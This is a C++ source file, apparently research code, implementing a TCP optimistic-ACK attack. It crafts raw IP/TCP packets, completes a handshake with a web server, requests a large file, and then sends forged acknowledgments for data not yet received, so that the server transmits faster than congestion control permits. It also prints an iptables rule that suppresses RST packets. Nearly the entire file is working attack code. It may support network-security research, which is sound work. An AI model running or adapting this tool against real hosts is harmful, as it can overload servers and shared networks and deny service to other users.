// Brian Neil Levine
// brian@cs.umass.edu
#include "utils.h"
#include <math.h>
#include <time.h>
#include <stdarg.h>

#include <iostream>
#include <set>
#include <algorithm>
#include <iostream>
using namespace std;

bool fncomp (u_int lhs, u_int rhs) {return lhs<rhs;}

struct classcomp {
	bool operator() (const u_int& lhs, const u_int& rhs) const
	{return lhs<rhs;}
};



template <class T> const T& maximum ( const T& a, const T& b ) {
	return (b<a)?a:b;     // or: return comp(b,a)?a:b; for the comp version
}



struct tcp_options {
	// this must be multiple of 32 bits but can have zeros.
	u_int8_t op0;
	u_int8_t op1;
	u_int8_t op2;
	u_int8_t op3;
	
	u_int8_t op4;
	u_int8_t op5;
	u_int8_t op6;
	u_int8_t op7;
	
	u_int8_t op8;
	u_int8_t op9;
	u_int8_t op10;
	u_int8_t op11;
	
	u_int32_t op12;
	u_int32_t op13;
};


struct tcp_SACKoptions {
	// this must be multiple of 32 bits but can have zeros.
	u_int8_t op0; //kind
	u_int8_t op1;  //length
	u_int32_t op2;// le b1
	u_int32_t op3;// re b1
	u_int32_t op4;// le b2
	u_int32_t op5;// re b2
	u_int8_t op6; //unused
	u_int8_t op7;//unused
};

class tcpPackets {
private:
	char datagram[4096]; /* the buffer used to construct packets */
	struct ip *ipHdr ; //pointer to the ip header in datagram
	struct tcphdr *tcpHdr; //pointer to the tcp header in datagram */
	struct tcp_SACKoptions tcpOptions; //stores the tcp options, placed after the header
	
	struct sockaddr_in destAddr; //for the socket that we'll create
	int sockfd; // the raw socket file descriptor
	
	char srcIP[17]; //source IP address, string supplied on command line (parsed by options() function)
	unsigned short srcPort; //source port; chosen randomly below
	char destIP[17]; //destination IP address, string supplied on command line (parsed by options() function)
	const unsigned short destPort; //dest point, supplied on command line (parsed by options() function)
	pcap_t *handle;		// pcap session handle; some hard-coded variables in pcapInit()
	char filter_exp[300]; //the pcap filter expression
	unsigned int curAck,curSeq; //the last Ack and Seq used, normally updated in code below to store the max ever sent
	bool verbose; //whether to print verbose info; dynamic based on network problems
	const int augmentDenom; // the determines the rate at which we grow to maxAug
	const int maxAug; // the maximum number of segements we can optimisitically ack for
	const unsigned char windowScaling; //tcp windowScaling parameter set in the SYN packet
	
	
	
	
	void debug (const char *fmt, ... ){
		if (verbose==true) {
			va_list args;
			
			va_start(args, fmt);
			vfprintf(stderr, fmt, args);
			va_end(args);
			//	    fprintf(stdout,fmt);
		}
		
	}
	Log log; //not used much right now
	
	
public:
	tcpPackets(const char sip[17], const char dip[], unsigned short dp, int aD, int ma, unsigned short ws):
	destPort(dp), augmentDenom(aD) , maxAug(ma), windowScaling(ws){
		
		snprintf(srcIP,   sizeof(srcIP),"%s",sip);
		snprintf(destIP,  sizeof(destIP),"%s",dip);
		srand(time(NULL)); //seed port based on current time
		srcPort=rand() % 61438 +4097; //ensure port is between 4096 and 65535
		
		sockfd=0;
		printf("src %s dst %s \n",srcIP,destIP);
		printf("Src port: %d\n",srcPort);
		sprintf (filter_exp,"ip src %s and dst %s and port %u",destIP,srcIP,srcPort);	
		printf("Init of pcap filter: %s\n",filter_exp);
		printf("You'll want to do this on linux\n");
		printf("\tiptables -A OUTPUT -p tcp --tcp-flags RST RST -s %s -d %s --dport %d -j DROP\n",srcIP, destIP, destPort);
		
		
		curAck=0;
		curSeq = 0;
		
		// References for TCP options:
		// http://www.packetshack.org/index.php?page=decode_tcp_opt
		tcp_options * topts;
		topts = (tcp_options*)&tcpOptions;
		topts->op0=0x02; //mss
		topts->op1=0x04;//mss
		topts->op2=0x05;//0x05B4=1460 decimal
		topts->op3=0xB4;// see above
		topts->op4=0x01;//no op
		topts->op5=0x03;// window scaling
		topts->op6=0x03;//window scaling
		topts->op7=windowScaling;//shift factor  (<< 0x1 multiplies by 2
		topts->op8=0x00;//04;//sackOK
		topts->op9=0x00;//02;//sackOK
		
		
		double windowsize;
		if (windowScaling ==0){
			windowsize = 65535;
		} else {
			windowsize =  powl(65535,windowScaling);
		}
		if (maxAug*1460 >windowsize){
			printf ("Augment bigger than receiver window size!\n");
		}
	};
	
	void synPacket(){
		fillPacket(TH_SYN,0,100,NULL,0); // initial syn packet should have an ack=0
		sendPacket();
	}
	
	
	//-------------------------------------------------------------------
	void openRawSocket()   {
		//	  doppleganger();
		sockfd = socket (PF_INET, SOCK_RAW, IPPROTO_TCP); /* open raw socket */
		if (sockfd<=0){
			perror("socket:");
			exit(-1);
		}
		destAddr.sin_family = AF_INET;
		inet_pton(AF_INET, destIP,&destAddr.sin_addr); // printable to network
		
		// let OS know that we'll be constructing our own headers, thank you very much.
		const int one = 1;
		const int *val = &one;
		if (setsockopt (sockfd, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0){
			perror("Error: setsockopt.");
			exit(-1);
		}
		
	};
	
	//-------------------------------------------------------------------
	//Send the datagram on the raw socket we have open already
	void sendPacket(){
		//hexdump(datagram,128);
		if (sendto (sockfd,datagram,ipHdr->ip_len ,0,(struct sockaddr *) &destAddr, sizeof (destAddr)) < 0) {
			perror("Error in sendto\n");
			exit(1);
		} 
	}
	
	//-------------------------------------------------------------------
	// Initialize the pcap filter. This is standard from the pcap tutorial http://www.tcpdump.org/pcap.html
	void pcapInit(const char dev[],int timeout){
		//dev is a device to sniff on
		char errbuf[PCAP_ERRBUF_SIZE];	// Error string 
		struct bpf_program fp;		/* The compiled filter expression */
		bpf_u_int32 mask;		/* The netmask of our sniffing device */
		bpf_u_int32 net;		/* The IP of our sniffing device */
		if (pcap_lookupnet(dev, &net, &mask, errbuf) == -1) {
			fprintf(stderr, "Can't get netmask for device %s\n", dev);
			net = 0;
			mask = 0;
		}
		debug("debug pcap filter: %s\n",filter_exp);
		handle = pcap_open_live(dev, /*snaplen*/65535, 1, timeout, errbuf);
		if (handle == NULL) {
			fprintf(stderr, "Couldn't open device %s: %s\n", dev, errbuf);
		}
		if (pcap_compile(handle, &fp, filter_exp, 0, net) == -1) {
			fprintf(stderr, "Couldn't parse filter %s: %s\n", filter_exp, pcap_geterr(handle));
		}
		if (pcap_setfilter(handle, &fp) == -1) {
			fprintf(stderr, "Couldn't install filter %s: %s\n", filter_exp, pcap_geterr(handle));
		}
		debug("pcap initialized.\n");
	}
	
	//-------------------------------------------------------------------
	int tcpChecksum(char*data,int datalen,int options_len){
		//tcp computes the checksum based on the TCP header, options, and payload prepended by a "pseudo header".
		// The pseudoheader is 12 bytes and consists of data from the IP packet and some other stuff.
		
		//pheader has to be 12 bytes larger than datagram; add 1kB here just for fun.
		char pheader[sizeof(datagram)+1024]; /* pseudoheader buffer for computing tcp checksum */
		
		//because th_len set is in units of 32 bits, the hdr size must also be so
		//this check could happen when packet is constructed
		static int tcpHdrSize = sizeof(struct tcphdr);
		if ((tcpHdrSize+options_len) % 4 != 0) {
			printf("tcphdr_size + options is %d (adjustment needed)!!\n",tcpHdrSize+options_len);
			exit(1);
		}
		//printf("\ttcphdr_size=%d\n",tcpHdrSize);
		//printf("\toptions_size=%d\n",options_len);
		//printf("\tpayload len is %d\n",datalen);
		
		memset(pheader,0x0,sizeof(pheader)); //zero out the buffer
		memcpy(&pheader,&(ipHdr->ip_src.s_addr),4); //source of address
		memcpy(&pheader[4],&(ipHdr->ip_dst.s_addr),4); //dest address
		pheader[8]=0; // this byte must be zero according to the TCP standard.
		pheader[9]=(u_int16_t)ipHdr->ip_p; //protocol number
		
		/* The TCP Length is the TCP header length plus the data length in
		 octets and it does not count the 12 octets of the pseudo
		 header. */
		int tcpLen = tcpHdrSize+ datalen+options_len;
		//		printf("\tTotal tcpPacket len is %d\n",tcpLen);
		pheader[10]=(u_int16_t)( tcpLen & 0xFF00)>>8;
		pheader[11]=(u_int16_t)( tcpLen & 0x00FF);
		
		
		memcpy(&pheader[12], tcpHdr, sizeof(struct tcphdr));
		
		if (options_len != 0) {
			//hexdump(&tcpOptions,sizeof(tcpOptions));
			memcpy(&pheader[12+ sizeof(struct tcphdr)], &tcpOptions, sizeof(struct tcp_SACKoptions));
			//printf("\toptions start at: pheader + tcphdr= %lu + %lu = %lu\n",12L,sizeof(struct tcphdr),12L+sizeof(struct tcphdr));
		} else {
			memcpy(&pheader[12+ sizeof(struct tcphdr)],data,datalen);
		}
		int checkSum =  csum ((uint16_t *) (pheader),tcpLen+12);
		//printf("\tcheckSum is %x.\n",checkSum);
		return checkSum;
	};
	
	
	//--------------------------------------------------------
	void fillPacket( short tcpFlags,unsigned int ack,unsigned int seq,  char * data , int datalen){
		//data is the payload of the TCP packet
		// what fillPacket() doesn't do is update CurSeq  given the payload size!!		
		curSeq=seq; // keep track of this across packets so that we don't repeat; we don't handle sequence wrap around (just need modulo)
		
		static char * payloadPtr; //pointer to datagram
		
		//debug("New pkt: seq=%u, \t\t\t ack=%u\n",seq,ack);
		memset(datagram, 0, 4096); // zero out the buffer; 
		//TODO: we could leave the ipHdr in tact for speed instead of zeroing out.
		ipHdr = (struct ip *) datagram;
		tcpHdr = (struct tcphdr *) (datagram + sizeof (struct ip));
		ipHdr->ip_hl = 5;
		ipHdr->ip_v = 4;
		ipHdr->ip_tos = 0;
		ipHdr->ip_id =  rand(); //srand() called above to set seed
		ipHdr->ip_off = 0;
		ipHdr->ip_ttl = 250;
		ipHdr->ip_p = 6;
		ipHdr->ip_sum = 0;
		inet_pton(AF_INET, srcIP, &(ipHdr->ip_src));
		ipHdr->ip_dst.s_addr = destAddr.sin_addr.s_addr;
		
		
		tcpHdr->th_sport = htons (srcPort); 
		tcpHdr->th_dport = htons (destPort);
		tcpHdr->th_seq = htonl(curSeq);
		tcpHdr->th_ack = htonl(ack);
		//tcpHdr->th_off ** is set below **
		tcpHdr->th_x2 = 0; //unused by tcp
		tcpHdr->th_flags = tcpFlags;
		tcpHdr->th_win = htons (65535); // max value
		tcpHdr->th_sum = 0; // computed below; must be zero before then
		tcpHdr->th_urp = 0; // urgent field
		
		
		// to do: allow both data and options together. this is just silly below
		
		if (data!=NULL){
			// payload but no options
			//debug("sending GET (%d bytes)\n",datalen);
			ipHdr->ip_len = sizeof (struct ip) + sizeof (struct tcphdr) +datalen;
			tcpHdr->th_off = 5;//this value times four equals the number of bytes in the header, no options, so we know we are 20 bytes
			payloadPtr = (char *)(datagram + sizeof(struct ip) + sizeof(struct tcphdr));
			//printf ("size of IP header: %lu\n",sizeof(struct ip) );
			//printf ("\tPayload length = %d bytes\n",datalen);
			memcpy(payloadPtr,data, datalen);
			tcpHdr->th_sum = tcpChecksum(data,datalen,0);
			
		} else {
			// options but no payload
			ipHdr->ip_len = sizeof (struct ip) + sizeof (struct tcphdr) +sizeof(struct tcp_SACKoptions); /*  tcp using option flags */
			char * tcpOptionsPtr = (char *) (datagram + sizeof(struct ip) + sizeof(struct tcphdr));
			//printf("fillpacket\n");
			//hexdump(&tcpOptions,64);
			//printf("----\n");
			
			memcpy(tcpOptionsPtr,&tcpOptions, sizeof(tcpOptions));
			tcpHdr->th_off = 5+sizeof(tcp_SACKoptions)/4 ;//this value times four equals the number of bytes in the header; but no data, so tcp doesn't even check
			tcpHdr->th_sum = tcpChecksum(NULL,0,sizeof(struct tcp_SACKoptions));
		}
		ipHdr->ip_sum = 0;
		
		
	};
	
	
	
	//-------------------------------------------------------------------
	// This is the main loop of the whole program
	// There is no way in mac is bind to a Raw socket for TCP packets, so we need pcap.
	unsigned long pcapGrab( char getMessage[]){
		
		struct pcap_pkthdr pkthdr;
		const u_char *packet;	/* The  packet that pcap received*/
		timeval start,now;
		gettimeofday(&start,NULL);
		
		/* Grab a packet */
		verbose = true;
		unsigned int round = 1;
		unsigned int baseSN=0; // starts as ISN from the server, then 0 if we wrap around
		unsigned long trueSeq = 0; // the real number of bytes received so since last wrap around
		unsigned int latestSeq = 0; // The latest sequence number received given this go around in the 2^32 sequence space
		int sinceLastFail = 0; // round of our last fail; to throttle aggressive TCP
		//unsigned int correctAck=0; // what we return to when we go overboard (the correct ACK)
		int augment = 0;
		
		unsigned lastReceivedAck = 0;//the seqence number that we received last; failback when we timeout
		
		const unsigned int maxRound = 100000;
		struct tcphdr *	tcphdr ;
		
		set<u_int32_t> Recvd;
		set<u_int32_t>::iterator it;
		
		
		u_int32_t lowerWindow = 0; // all sequences up to this value have been received correctly
		
		
		while (round <maxRound) {
			packet = pcap_next(handle,&pkthdr);
			// --- this section of code is run if we haven't received a packet in "timeout" ms, a value set in pgrabInit()
			// --- so this is our recovery algorithm
			if (packet==NULL){
				
				//pcap timed out waiting; value set in init() above
				//For our attack, this means we've stalled out
				// Right now, recovery is to just send an ack for the last seq recieved (not the max seq received)
				fprintf(stdout, "*");
				fflush(stdout);
				//turn on more verbose output while we recover
				verbose=true;
				
				sinceLastFail=round;
				
				if (0) {
					memset(&tcpOptions, 0x0,sizeof(tcpOptions));
					
					curAck=lowerWindow;
					printf( "\t	ACKing lw=%u\n",lowerWindow);
					//printf("options preFP\n");
					//hexdump(&tcpOptions,sizeof(tcpOptions));
					//printf("----\n");
					
					fillPacket(TH_ACK^TH_PUSH,lowerWindow,curSeq,NULL,0);
					
				} else {	
					curAck=lastReceivedAck-1;
					printf( "\t	ACKing lastreceived=%u\n",lastReceivedAck);
					fillPacket(TH_ACK^TH_PUSH,lastReceivedAck-1,curSeq,NULL,0);
				}
				sendPacket();
				continue;
			}
			
			
			if (round %2 == 0) {
				printf( ".");
				fflush(stdout);
			}
			
			
			static unsigned int segmentsize;
			
			gettimeofday(&now,NULL);
			debug("=== %6dms: Round %d ---\n",diff_ms(now,start),round);
			debug("Received\t%d bytes: ",pkthdr.len);
			
			//struct ip * iphdr = (struct ip *)(packet+14);
			tcphdr = (struct tcphdr *)(packet+14+20);
			segmentsize= pkthdr.len- (14+20+ tcphdr->th_off*4);
			
			debug("  ACK: %u", ntohl(tcphdr->th_ack) );
			debug("  SEQ: %u:%u ", ntohl(tcphdr->th_seq),ntohl(tcphdr->th_seq)+segmentsize);
			//debug("  DST IP: %s,", inet_ntoa(iphdr->ip_dst));
			//debug("  SRC IP: %s,", inet_ntoa(iphdr->ip_src));
			//debug("  SRC PORT: %d,", ntohs(tcphdr->th_sport) );
			//debug("  DST PORT: %d", ntohs(tcphdr->th_dport) );
			//debug("  FLAGS: ");
			if (TH_FIN&tcphdr->th_flags){printf("\n*** FIN *** \n");break;}
			if (TH_RST&tcphdr->th_flags){printf("\n*** Reset ***\n");break;}
			//if (TH_PUSH&tcphdr->th_flags){debug("Push ");}
			//if (TH_ACK&tcphdr->th_flags){debug("Ack ");}
			//if (TH_URG&tcphdr->th_flags){debug("Urg ");}
			//if (TH_ECE&tcphdr->th_flags){debug("Echo  ");}
			//if (TH_CWR&tcphdr->th_flags){debug("CongWR ");} 
			//debug("\n");
			
			if (round==1){
				debug("\n");
				//second part of three-way handshake
				if (((TH_SYN^TH_ACK) & tcphdr->th_flags)==0){
					printf("No SYN returned...Something is wrong.\n");		
					return 0;	
				} else {
					debug("\tReceived SYN-ACK\n");
					baseSN = ntohl(tcphdr->th_seq);
					printf("ISN:\t%u\n",baseSN);
					lowerWindow=baseSN;
				}
				//clear out options; the ones we set can only be specified in the SYN packet
				memset(&tcpOptions, 0x0,sizeof(tcpOptions));
				
				//third part of three-way handshake
				printf( "\t	ACKing lw=%u\n",lowerWindow);
				//printf("options preFP\n");
				//hexdump(&tcpOptions,sizeof(tcpOptions));
				//printf("----\n");
				
				
				fillPacket(TH_ACK,ntohl(tcphdr->th_seq)+1,curSeq+1,NULL,0);
				sendPacket();
				//send http get request
				//don't advance seq number; see tools.ietf.org/html/rfc793 figure 7.
				debug("Sending %d byte payload: %s \n",strlen(getMessage),getMessage);
				fillPacket(TH_ACK^TH_PUSH,ntohl(tcphdr->th_seq)+1,curSeq,getMessage,strlen(getMessage));
				curSeq += strlen(getMessage);
				sendPacket();
				
				char text2[1]={0x0a};
				//printf("Sending %lu bytes: text== %s\n",sizeof(text2),text2);
				//traces/network/dieselnet-fall2007/release.tar.gz
				fillPacket(TH_ACK^TH_PUSH,ntohl(tcphdr->th_seq)+1,curSeq,text2,sizeof(text2));
				curSeq += 1;
				sendPacket();
			}
			
			if (round-sinceLastFail > 3){
				verbose=false;
			}
			
			
			//this baseSN is some code to deal with wrap around, but it's not really developed.
			// wrap around doesn't really happen often.
			
			if (round >1 ) {
				//get data (run attack)
				
				static unsigned int thisAck;
				thisAck= ntohl(tcphdr->th_seq)+segmentsize+1; // what we **should** ack for this packet
				lastReceivedAck= maximum(lastReceivedAck,thisAck); // keep track of largest last good received segment for when we try to recover
				
				// check for wrap around
				if(ntohl(tcphdr->th_seq) >= baseSN) {
					debug("(%lu)\n",ntohl(tcphdr->th_seq) - baseSN + trueSeq);
					latestSeq = maximum(latestSeq,ntohl(tcphdr->th_seq)+segmentsize);
				} else {
					// we wraped around
					printf("(%lu)\n",ntohl(tcphdr->th_seq) - baseSN + trueSeq);
					printf("\n\tSEQUENCE NUMBER WRAP AROUND ************************\n");
					exit(-1);//this code is untested; you can comment out this exit if you want to try it out
					
					trueSeq += UINT_MAX - baseSN;
					baseSN=0;
					latestSeq=ntohl(tcphdr->th_seq)+segmentsize ;
				}
				
				
				for (u_int32_t i=ntohl(tcphdr->th_seq);i<=ntohl(tcphdr->th_seq)+segmentsize;i++){
					Recvd.insert(i);
				}
				if (0) { //SACKing
					//update lower window
					
					// try to avoid checking entire data structure
					//see if this is the packet we were expecting
					static set<u_int32_t>::iterator itr;
					if (ntohl(tcphdr->th_seq) == lowerWindow) {
						lowerWindow +=segmentsize;
						debug("was expected lw %u\n",lowerWindow);
						
					}
					//now check if it's also the highest ever received.
					if (latestSeq == lowerWindow) {
						debug ("iop\n");
						memset(&tcpOptions, 0x0,sizeof(tcpOptions));
						
					} else {
						// out of order, search for new lw
						debug("oop\n");
						itr = Recvd.upper_bound(lowerWindow);
						debug("lb = \t%u (looping)\n",*itr);
						fflush(stdout);
						while (lowerWindow+1==*itr){
							//	printf("found lb %u\n",*itr);
							lowerWindow++;
							itr = Recvd.upper_bound(lowerWindow);
						}
						
						debug("new lw ack %u\n",lowerWindow);
						debug("looping with itr==%u\n",*itr);
						u_int32_t leftEdge,RightEdge;
						leftEdge= *itr;
						RightEdge= *itr-1;
						//find end of contigous blocks
						while (RightEdge+1==*itr){
							//printf("incr RE %lu==%lu\n",*itr,RightEdge);
							RightEdge++;
							itr++;
						}
						--itr;						
						RightEdge = *itr;
						printf("sacking %u-->%u\n",leftEdge,RightEdge);
						
						// References for TCP options:
						// htp://www.packetshack.org/index.php?page=decode_tcp_opt
						char * optptr = (char *) &tcpOptions;
						*optptr = 5;
						*(optptr+1)=10;
						u_int32_t * val = (u_int32_t *) (optptr+2);
						*val = htonl(leftEdge);
						val ++;
						*val= htonl(RightEdge);
					}
				}
				
				
				static unsigned int toAck;
				static unsigned int fakeAck;
				toAck= maximum(latestSeq,thisAck); //we shouldn't ack earlier than the latest seq received
				fakeAck= thisAck;// initialize the fakeAck to what we should ack.
				
				
				if (round-sinceLastFail >= 10){
					verbose=false; // things are going well, turn off verbose output
					//************************************************************************
					fakeAck=toAck;
					static float tmp;
					tmp= (1.0*round-sinceLastFail)/augmentDenom*maxAug;//slowly increase to our max optimistic ack to match increasing window
					augment = lrintl(tmp);
					if (augment>maxAug){
						augment = maxAug;
					}
					//augment=0;//uncomment to short circuit optimistic acking during debugging.
					//TODO packets aren't always 1460 in length
					fakeAck = toAck+augment*1460;
					
					if (fakeAck > pow(2,32)){
						printf("\n\tSEQUENCE NUMBER WRAP AROUND ************************\n");
						printf("too large!!!! toAck=%u fake=%u, %f	\n",toAck,fakeAck,pow(2,32));
						exit(-1);
						//TODO: this doesn't fix the problem
						fakeAck = 2^32-1;
					}
				}
				curAck = fakeAck;
				if (round %100 == 0){
					{  
						long unsigned int sent = trueSeq+ (latestSeq-baseSN);
						long unsigned int recvd = Recvd.size();
						long int lost = sent - recvd;
						float percLost = (lost*100.0)/sent;
						
						gettimeofday(&now,NULL);
						static float dif,tmp ;
						dif = diff_ms(now,start)/1000.0;
						tmp= (1.0*round-sinceLastFail)/augmentDenom*maxAug;//this is the value of augment above; just used for printf here
						
						printf ("\n%.1fs: Sender=%.1lfKB/s (%.1lfMB/s), %.1fMB sent;    Recevd=%.1fKB/S [speedup=%.1f], %.1fMB recvd; Lost=%2.0f%%;    augment =%d segs\n",
								dif,
								sent/(dif*1024),
								sent/(dif*1024*1024),
								sent/(1024.0*1024),
								Recvd.size()/(dif*1024),
								sent/(Recvd.size()*1.0),
								Recvd.size()/(1024.0*1024.0),
								percLost,
								augment);	
					}
					
				}
				
				if (0) {
					
					fakeAck = lowerWindow+1;
					
				}
				debug("acking %u\n",fakeAck);
				fillPacket(TH_ACK,fakeAck,curSeq,NULL,0);
				//log.writeSeq(trueSeq+ (latestSeq-baseSN),diff_ms(now,start));
				//log.writeAck(trueSeq+ (curAck-baseSN),diff_ms(now,start));
				sendPacket();
					//sendPacket();
				//	sendPacket();
			}
			round ++;
		}
		//fillPacket(TH_RST,curAck,curSeq+1,NULL,0);
		//sendPacket();
		pcap_close(handle);
		log.close();
		//printf("%lu bytes sent, %lu received \n",trueSeq+ (latestSeq-baseSN),Recvd.size());
		
		//ok this is ugly, but I'm too tired to clean up
		{  
			long unsigned int sent = trueSeq+ (latestSeq-baseSN);
			long unsigned int recvd = Recvd.size();
			long unsigned int lost = sent - recvd;
			float percLost = (lost*100.0)/sent;
			gettimeofday(&now,NULL);
			static float dif,tmp ;
			dif = diff_ms(now,start)/1000.0;
			tmp= (1.0*round-sinceLastFail)/augmentDenom*maxAug;//this is the value of augment above; just used for printf here
			
			printf ("\n%.1fs: Sender=%.1lfKB/s (%.1lfMB/s), %.1fMB sent;    Recevd=%.1fKB/S [speedup=%.1f], %.1fMB recvd; Lost=%2.0f%%;    augment =%d segs\n",
					dif,
					sent/(dif*1024),
					sent/(dif*1024*1024),
					sent/(1024.0*1024),
					Recvd.size()/(dif*1024),
					sent/(Recvd.size()*1.0),
					Recvd.size()/(1024.0*1024.0),
					percLost,
					augment);	
		}
		
		
		return (trueSeq+ (latestSeq-baseSN));		
	};
};


int main(int argc, char **argv) {
	if(getuid()){
		fprintf(stderr,"\n You must be root to run this program.\n");
		exit(1);
	}
	
	char srcIP[17];
	char destIP[17]; 
	char get_path[GET_PATH_LEN];
	unsigned short destPort=80;
	int augmentDenom=1000; 
	int maxAug=0; 
	u_char windowScaling=0x07;
	
	unsigned long bytes;
	
	strncpy(get_path, "/centos/5.6/isos/x86_64/CentOS-5.6-x86_64-netinstall.iso", sizeof(get_path));

	options(argc,argv,srcIP,destIP, get_path, destPort,augmentDenom,maxAug,windowScaling);
	printf("MaxAug = %d\nWindowScaling = %x\n",maxAug,windowScaling);
	tcpPackets t(srcIP,destIP, destPort,augmentDenom,maxAug,windowScaling);
	
	char interface[] = "eth0";
	int timeout = 250;
	printf("Using interface %s with timeout of %dms.\n",interface,timeout);
	t.pcapInit(interface,timeout); //device to sniff on is en1, timeout value for waiting for a new packet
	t.openRawSocket();
	
	timeval startTE,endTE;
	gettimeofday(&startTE,NULL);
	
	t.synPacket();
	printf ("\tAwaiting SYN-ACK\n\n");
	
	
	//char text[]="GET / HTTP/1.0\n";
	//char getMessage[]="GET /traces/network/dieselnet-fall2007/release.tar.gz HTTP/1.0\n";
	//char text[]="GET /release.tar.gz HTTP/1.0\n";

	//128.111.52.113  -- boston.cs.ucsb.edu
	//char getMessage[]="GET /centos/5.6/isos/x86_64/CentOS-5.6-x86_64-netinstall.iso HTTP/1.0\n";	
	char *getMessage;
	int result = asprintf(&getMessage, "GET %s HTTP/1.0\r\n\r\n", get_path);
	if (!result) {
	  printf("error copying GET path\n");
	  exit(1);
	}
	else {
	  printf("getMessage: ");
	  printf(getMessage);
	}

	bytes= t.pcapGrab(getMessage);
		
	gettimeofday(&endTE,NULL);
	float dif = diff_ms(endTE,startTE)/1000.0;
	printf ("\n%f seconds.\n", dif );
	printf ("Throughput %.1lf KB/s (%.1lf MB/s)\n",bytes/(dif*1024),bytes/(dif*1024*1024));	
	printf("\nExit\n");
	exit(0);
	
}
